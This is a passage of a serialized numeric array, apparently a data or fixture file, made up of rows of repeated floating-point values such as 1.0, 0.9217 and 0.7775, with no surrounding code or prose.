0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - ], - [ - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - ], - [ - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - ], - [ - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - ], - [ - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - ], - [ - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - ], - [ - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - ], - [ - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - ], - [ - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - ], - [ - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - ], - [ - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - ], - [ - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - ], - [ - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - ], - [ - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - ], - [ - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - ], - [ - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - ], - [ - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - ], - [ - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.7110596409959468, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.5717043041883806, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 0.28228141285466124, - 